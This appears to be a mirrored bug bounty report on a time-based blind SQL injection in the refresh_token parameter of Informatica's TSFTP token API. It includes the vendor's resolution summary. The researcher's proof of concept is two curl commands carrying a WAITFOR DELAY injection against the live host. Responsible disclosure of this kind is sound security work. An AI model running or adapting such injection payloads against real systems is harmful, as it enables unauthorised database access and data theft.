Loading HuntDB...

Blind SQL injection at tsftp.informatica.com

Critical
I
Informatica
Submitted None

Team Summary

Official summary from Informatica

Researcher identified a time based/blind SQL injection in an Informatica TSFTP website and responsibly disclosed via this report. Informatica's incident response team engaged within minutes of the report being received, bringing the site offline for maintenance as the issue was resolved. Following resolution of the issue and confirmation from our security team the site was brought back online. Additionally web server access logs and database logs from before the issue existed were reviewed, showing the issue had not been exploited by any malicious attackers.

Reported by r1pley

Vulnerability Details

Technical details and impact analysis

SQL Injection
The parameter `refresh_token` sent to the REST path /api/v1/token is vulnerable to blind SQL injection. Compare the response time of these 2 requests: ``` $ time curl -X POST "https://tsftp.informatica.com/api/v1/token" -H "accept: application/json" -H "Content-Type: application/x-www-form-urlencoded" -d "grant_type=refresh_token&refresh_token='; WAITFOR DELAY '0:0:1'--" {"error":"invalid_grant"}curl -X POST "https://tsftp.informatica.com/api/v1/token" -H -H -d 0.02s user 0.01s system 1% cpu 2.048 total ``` vs ``` $ time curl -X POST "https://tsftp.informatica.com/api/v1/token" -H "accept: application/json" -H "Content-Type: application/x-www-form-urlencoded" -d "grant_type=refresh_token&refresh_token='; WAITFOR DELAY '0:0:13'--" {"error":"invalid_grant"}curl -X POST "https://tsftp.informatica.com/api/v1/token" -H -H -d 0.02s user 0.01s system 0% cpu 14.045 total ``` and notice that the WAITFOR DELAY command is executed. ## Impact Blind SQL injection can be exploited to exfiltrate data from the FTP server, bypass authentication or for remote code execution. I stopped my testing at the time-based PoC because I didn't want to risk accessing sensitive data. If you would like to though, I can continue exploiting this vulnerability to present the above impact in practice, eg by getting the database version string.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

SQL Injection